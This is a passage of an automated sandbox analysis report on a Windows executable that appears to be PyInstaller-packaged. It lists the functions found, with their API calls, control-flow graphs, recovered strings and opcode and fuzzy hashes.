                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF69F3FE3BA,?,?,-00000018,00007FF69F3FA063,?,?,?,00007FF69F3F9F5A,?,?,?,00007FF69F3F524E), ref: 00007FF69F3FE19C
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF69F3FE3BA,?,?,-00000018,00007FF69F3FA063,?,?,?,00007FF69F3F9F5A,?,?,?,00007FF69F3F524E), ref: 00007FF69F3FE1A8
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                    • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                    • Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                                                                                                                                                                    • Instruction ID: c0a2210a270e3655998636897df1d307ffa1d24db630c47db9f2a3ef920fc662
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3941E031B19A0282FA76CB17E9006752392FF49BA0F0A4579DD0DCB785EE3CE9859384
                                                                                                                                                                                                                                                    Function 00007FF69F3E7C40 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 116COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF69F3E3834), ref: 00007FF69F3E7CE4
                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,?,FFFFFFFF,00007FF69F3E3834), ref: 00007FF69F3E7D2C
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F3E7E10: GetEnvironmentVariableW.KERNEL32(00007FF69F3E365F), ref: 00007FF69F3E7E47
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F3E7E10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF69F3E7E69
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F3F7548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69F3F7561
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F3E26C0: MessageBoxW.USER32 ref: 00007FF69F3E2736
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                                    • API String ID: 740614611-1339014028
                                                                                                                                                                                                                                                    • Opcode ID: e203fb9b2ed022230aea9b70073d79c64569b0fcacf7335b186391ffe1e7d089
                                                                                                                                                                                                                                                    • Instruction ID: 30b53332c393a797d27ac520d1f984d6a9f3782839493fe7b01000f240fb2279
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e203fb9b2ed022230aea9b70073d79c64569b0fcacf7335b186391ffe1e7d089
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02419511E0964242FA70EB62D9552F92351EF55B80F5601B9EE2DCF797EE7CE9048380
                                                                                                                                                                                                                                                    Function 00007FF69F3FAD6C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 572 7ff69f3fad6c-7ff69f3fad92 573 7ff69f3fad94-7ff69f3fada8 call 7ff69f3f43d4 call 7ff69f3f43f4 572->573 574 7ff69f3fadad-7ff69f3fadb1 572->574 592 7ff69f3fb19e 573->592 575 7ff69f3fb187-7ff69f3fb193 call 7ff69f3f43d4 call 7ff69f3f43f4 574->575 576 7ff69f3fadb7-7ff69f3fadbe 574->576 595 7ff69f3fb199 call 7ff69f3f9bf0 575->595 576->575 578 7ff69f3fadc4-7ff69f3fadf2 576->578 578->575 581 7ff69f3fadf8-7ff69f3fadff 578->581 584 7ff69f3fae01-7ff69f3fae13 call 7ff69f3f43d4 call 7ff69f3f43f4 581->584 585 7ff69f3fae18-7ff69f3fae1b 581->585 584->595 590 7ff69f3fb183-7ff69f3fb185 585->590 591 7ff69f3fae21-7ff69f3fae27 585->591 593 7ff69f3fb1a1-7ff69f3fb1b8 590->593 591->590 596 7ff69f3fae2d-7ff69f3fae30 591->596 592->593 595->592 596->584 599 7ff69f3fae32-7ff69f3fae57 596->599 601 7ff69f3fae8a-7ff69f3fae91 599->601 602 7ff69f3fae59-7ff69f3fae5b 599->602 603 7ff69f3fae93-7ff69f3faebb call 7ff69f3fc90c call 7ff69f3f9c58 * 2 601->603 604 7ff69f3fae66-7ff69f3fae7d call 7ff69f3f43d4 call 7ff69f3f43f4 call 7ff69f3f9bf0 601->604 605 7ff69f3fae82-7ff69f3fae88 602->605 606 7ff69f3fae5d-7ff69f3fae64 602->606 637 7ff69f3faebd-7ff69f3faed3 call 7ff69f3f43f4 call 7ff69f3f43d4 603->637 638 7ff69f3faed8-7ff69f3faf03 call 7ff69f3fb594 603->638 634 7ff69f3fb010 604->634 607 7ff69f3faf08-7ff69f3faf1f 605->607 606->604 606->605 611 7ff69f3faf21-7ff69f3faf29 607->611 612 7ff69f3faf9a-7ff69f3fafa4 call 7ff69f402c2c 607->612 611->612 616 7ff69f3faf2b-7ff69f3faf2d 611->616 623 7ff69f3fb02e 612->623 624 7ff69f3fafaa-7ff69f3fafbf 612->624 616->612 620 7ff69f3faf2f-7ff69f3faf45 616->620 620->612 625 7ff69f3faf47-7ff69f3faf53 620->625 627 7ff69f3fb033-7ff69f3fb053 ReadFile 623->627 624->623 629 7ff69f3fafc1-7ff69f3fafd3 GetConsoleMode 624->629 625->612 630 7ff69f3faf55-7ff69f3faf57 625->630 632 7ff69f3fb14d-7ff69f3fb156 GetLastError 627->632 633 7ff69f3fb059-7ff69f3fb061 627->633 629->623 635 7ff69f3fafd5-7ff69f3fafdd 629->635 630->612 636 7ff69f3faf59-7ff69f3faf71 630->636 642 7ff69f3fb173-7ff69f3fb176 632->642 643 7ff69f3fb158-7ff69f3fb16e call 7ff69f3f43f4 call 7ff69f3f43d4 632->643 633->632 639 7ff69f3fb067 633->639 644 7ff69f3fb013-7ff69f3fb01d call 7ff69f3f9c58 634->644 635->627 641 7ff69f3fafdf-7ff69f3fb001 ReadConsoleW 635->641 636->612 645 7ff69f3faf73-7ff69f3faf7f 636->645 637->634 638->607 648 7ff69f3fb06e-7ff69f3fb083 639->648 650 7ff69f3fb003 GetLastError 641->650 651 7ff69f3fb022-7ff69f3fb02c 641->651 655 7ff69f3fb17c-7ff69f3fb17e 642->655 656 7ff69f3fb009-7ff69f3fb00b call 7ff69f3f4368 642->656 643->634 644->593 645->612 654 7ff69f3faf81-7ff69f3faf83 645->654 648->644 658 7ff69f3fb085-7ff69f3fb090 648->658 650->656 651->648 654->612 662 7ff69f3faf85-7ff69f3faf95 654->662 655->644 656->634 664 7ff69f3fb092-7ff69f3fb0ab call 7ff69f3fa984 658->664 665 7ff69f3fb0b7-7ff69f3fb0bf 658->665 662->612 672 7ff69f3fb0b0-7ff69f3fb0b2 664->672 668 7ff69f3fb0c1-7ff69f3fb0d3 665->668 669 7ff69f3fb13b-7ff69f3fb148 call 7ff69f3fa7c4 665->669 673 7ff69f3fb0d5 668->673 674 7ff69f3fb12e-7ff69f3fb136 668->674 669->672 672->644 676 7ff69f3fb0da-7ff69f3fb0e1 673->676 674->644 677 7ff69f3fb0e3-7ff69f3fb0e7 676->677 678 7ff69f3fb11d-7ff69f3fb128 676->678 679 7ff69f3fb103 677->679 680 7ff69f3fb0e9-7ff69f3fb0f0 677->680 678->674 681 7ff69f3fb109-7ff69f3fb119 679->681 680->679 682 7ff69f3fb0f2-7ff69f3fb0f6 680->682 681->676 683 7ff69f3fb11b 681->683 682->679 684 7ff69f3fb0f8-7ff69f3fb101 682->684 683->674 684->681
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                    • Opcode ID: 7e4b6968f21da67f115f2b5899b729ebe27c21aa0167ab1df282e77588440d71
                                                                                                                                                                                                                                                    • Instruction ID: c83e377951f5485fca25b3402264ad94cbd644d76d92c15fca4da126f3d41622
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e4b6968f21da67f115f2b5899b729ebe27c21aa0167ab1df282e77588440d71
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74C10562A1C78791FBB09B1594002BE3B50FB90B94F5701B9DA4E8B792CF7DE855A380
                                                                                                                                                                                                                                                    Function 00007FF69F3E7B50 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 995526605-0
                                                                                                                                                                                                                                                    • Opcode ID: 62e4819b0c80cd137060bb94e6a3fe70b8e549ab62dcd95e051829f5e08db428
                                                                                                                                                                                                                                                    • Instruction ID: e851e575ad966235c48b7af723e44a2688230c1928593f5be9ec2cafb84e00b5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 62e4819b0c80cd137060bb94e6a3fe70b8e549ab62dcd95e051829f5e08db428
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D21A331A0CA4282EB308B55E44423AB3A5FF85BA4F150279EA7DC7BE5DFBCD8458740
                                                                                                                                                                                                                                                    Function 00007FF69F3E33E0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,00007FF69F3E3534), ref: 00007FF69F3E3411
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F3E29E0: GetLastError.KERNEL32(?,?,?,00007FF69F3E342E,?,00007FF69F3E3534), ref: 00007FF69F3E2A14
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F3E29E0: FormatMessageW.KERNEL32(?,?,?,00007FF69F3E342E), ref: 00007FF69F3E2A7D
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F3E29E0: MessageBoxW.USER32 ref: 00007FF69F3E2ACF
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Message$ErrorFileFormatLastModuleName
                                                                                                                                                                                                                                                    • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                                    • API String ID: 517058245-2863816727
                                                                                                                                                                                                                                                    • Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                                                                                                                                    • Instruction ID: 502699e74076f42befbc5b2bf4aad573224626880b3aec74964ecbd50d99dec1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C821B621F1C54392FB31AB25E8013B92350FF58784F8202BAD65DCB6D6EE6CE908CB40
                                                                                                                                                                                                                                                    Function 00007FF69F3E8400 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F3E7B50: GetCurrentProcess.KERNEL32 ref: 00007FF69F3E7B70
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F3E7B50: OpenProcessToken.ADVAPI32 ref: 00007FF69F3E7B83
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F3E7B50: GetTokenInformation.KERNELBASE ref: 00007FF69F3E7BA8
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F3E7B50: GetLastError.KERNEL32 ref: 00007FF69F3E7BB2
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F3E7B50: GetTokenInformation.KERNELBASE ref: 00007FF69F3E7BF2
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F3E7B50: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF69F3E7C0E
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF69F3E7B50: CloseHandle.KERNEL32 ref: 00007FF69F3E7C26
                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,00007FF69F3E3814), ref: 00007FF69F3E848C
                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,00007FF69F3E3814), ref: 00007FF69F3E8495
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                    • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                                    • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                                    • Opcode ID: 66c7400c0f842d66862a6c7a5c7e226ffa5096460946b14aa4108adf3e2753a4
                                                                                                                                                                                                                                                    • Instruction ID: 3a0ed5dfead8f93e7fba3f5f5a33461db9fe9a7deee7b8ac87e41566b4c5fe2a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 66c7400c0f842d66862a6c7a5c7e226ffa5096460946b14aa4108adf3e2753a4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FB217131A0874282F720AB11E9153F963A0FF98780F4641B9EA5DCB796DF7CD848C780
                                                                                                                                                                                                                                                    Function 00007FF69F3FC270 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 819 7ff69f3fc270-7ff69f3fc295 820 7ff69f3fc563 819->820 821 7ff69f3fc29b-7ff69f3fc29e 819->821 824 7ff69f3fc565-7ff69f3fc575 820->824 822 7ff69f3fc2a0-7ff69f3fc2d2 call 7ff69f3f9b24 821->822 823 7ff69f3fc2d7-7ff69f3fc303 821->823 822->824 826 7ff69f3fc305-7ff69f3fc30c 823->826 827 7ff69f3fc30e-7ff69f3fc314 823->827 826->822 826->827 829 7ff69f3fc324-7ff69f3fc339 call 7ff69f402c2c 827->829 830 7ff69f3fc316-7ff69f3fc31f call 7ff69f3fb630 827->830 834 7ff69f3fc453-7ff69f3fc45c 829->834 835 7ff69f3fc33f-7ff69f3fc348 829->835 830->829 836 7ff69f3fc4b0-7ff69f3fc4d5 WriteFile 834->836 837 7ff69f3fc45e-7ff69f3fc464 834->837 835->834 838 7ff69f3fc34e-7ff69f3fc352 835->838 841 7ff69f3fc4e0 836->841 842 7ff69f3fc4d7-7ff69f3fc4dd GetLastError 836->842 843 7ff69f3fc49c-7ff69f3fc4ae call 7ff69f3fbd28 837->843 844 7ff69f3fc466-7ff69f3fc469 837->844 839 7ff69f3fc354-7ff69f3fc35c call 7ff69f3f3ae0 838->839 840 7ff69f3fc363-7ff69f3fc36e 838->840 839->840 846 7ff69f3fc370-7ff69f3fc379 840->846 847 7ff69f3fc37f-7ff69f3fc394 GetConsoleMode 840->847 849 7ff69f3fc4e3 841->849 842->841 864 7ff69f3fc440-7ff69f3fc447 843->864 850 7ff69f3fc46b-7ff69f3fc46e 844->850 851 7ff69f3fc488-7ff69f3fc49a call 7ff69f3fbf48 844->851 846->834 846->847 854 7ff69f3fc44c 847->854 855 7ff69f3fc39a-7ff69f3fc3a0 847->855 857 7ff69f3fc4e8 849->857 858 7ff69f3fc4f4-7ff69f3fc4fe 850->858 859 7ff69f3fc474-7ff69f3fc486 call 7ff69f3fbe2c 850->859 851->864 854->834 862 7ff69f3fc429-7ff69f3fc43b call 7ff69f3fb8b0 855->862 863 7ff69f3fc3a6-7ff69f3fc3a9 855->863 865 7ff69f3fc4ed 857->865 866 7ff69f3fc500-7ff69f3fc505 858->866 867 7ff69f3fc55c-7ff69f3fc561 858->867 859->864 862->864 872 7ff69f3fc3b4-7ff69f3fc3c2 863->872 873 7ff69f3fc3ab-7ff69f3fc3ae 863->873 864->857 865->858 868 7ff69f3fc533-7ff69f3fc53d 866->868 869 7ff69f3fc507-7ff69f3fc50a 866->869 867->824 876 7ff69f3fc544-7ff69f3fc553 868->876 877 7ff69f3fc53f-7ff69f3fc542 868->877 874 7ff69f3fc523-7ff69f3fc52e call 7ff69f3f43b0 869->874 875 7ff69f3fc50c-7ff69f3fc51b 869->875 878 7ff69f3fc3c4 872->878 879 7ff69f3fc420-7ff69f3fc424 872->879 873->865 873->872 874->868 875->874 876->867 877->820 877->876 881 7ff69f3fc3c8-7ff69f3fc3df call 7ff69f402cf8 878->881 879->849 885 7ff69f3fc3e1-7ff69f3fc3ed 881->885 886 7ff69f3fc417-7ff69f3fc41d GetLastError 881->886 887 7ff69f3fc3ef-7ff69f3fc401 call 7ff69f402cf8 885->887 888 7ff69f3fc40c-7ff69f3fc413 885->888 886->879 887->886 892 7ff69f3fc403-7ff69f3fc40a 887->892 888->879 890 7ff69f3fc415 888->890 890->881 892->888
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF69F3FC25B), ref: 00007FF69F3FC38C
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF69F3FC25B), ref: 00007FF69F3FC417
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 953036326-0
                                                                                                                                                                                                                                                    • Opcode ID: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
                                                                                                                                                                                                                                                    • Instruction ID: 005c4adde515e4489f81d712680a3eec344123130915e963e7451c12cf23e0d9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5791B062E4865285F7B1CB7594406BD2BA0FB44BC8F1641BDDE0EEBA85CE3CD542A780
                                                                                                                                                                                                                                                    Function 00007FF69F3F4938 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1279662727-0
                                                                                                                                                                                                                                                    • Opcode ID: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                                                                                                                                                                                                                    • Instruction ID: 5809077aa21dcc2964b791871fd141b3b22c340bdbd6b84ed2658088b6707a69
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E41D522E1878283F7A08B61D5003797360FBA47A4F219379E69C8BAD1DF7CA1E09740
                                                                                                                                                                                                                                                    Function 00007FF69F3EBF5C Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
